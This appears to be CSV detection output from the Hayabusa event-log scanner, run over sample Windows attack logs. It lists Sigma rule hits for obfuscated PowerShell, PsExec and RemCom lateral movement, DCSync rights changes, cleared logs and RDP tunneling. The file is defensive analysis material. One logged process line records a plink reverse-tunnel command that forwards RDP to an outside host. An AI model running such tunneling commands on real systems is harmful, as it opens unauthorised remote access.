Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: 